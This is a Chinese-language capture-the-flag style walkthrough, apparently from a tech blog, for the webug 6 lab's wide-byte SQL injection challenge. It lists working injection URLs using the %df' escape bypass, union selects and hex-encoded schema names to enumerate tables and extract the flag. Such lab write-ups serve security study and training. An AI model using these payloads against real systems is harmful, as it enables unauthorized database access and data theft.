IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> webug 6、宽字节注入 -> 正文阅读

[PHP知识库]webug 6、宽字节注入

url:http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1

http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ and 1=1 --+ 不报错

http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ order by 2 --+ 不报错

http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,2 --+ 回显为2

下面可以查出用户权限,数据库版本,当前数据库等
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,user() --+

用户权限: root@localhost,数据库版本:5.5.53,当前数据库: webug_width_byte

查看webug_width_byte下的表
hhttp://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘webug_width_byte’ --+ 报错

因为引号被转义了,所以把数据库进行16进制的转换(16进制在mysql数据库中可直接执行,所以不需要转义冒号)
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x77656275675F77696474685F62797465 --+

表为: sqlinjection,storage_xss
查询表:sqlinjection
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x73716C696E6A656374696F6E --+

最后发现,flag值不在webug_width_byte数据库中,哭晕,老老实实去webug数据库中找

http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7765627567 --+ webug=0x7765627567

http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656E765F6C697374 --+ env_list=0x656E765F6C697374

http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,envFlag from webug.env_list where id=6 --+ 因为flag值在id=6中

flag值为: dfsadfsadfas

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-21 20:28:31  更:2022-03-21 20:30:03 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 22:47:49-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码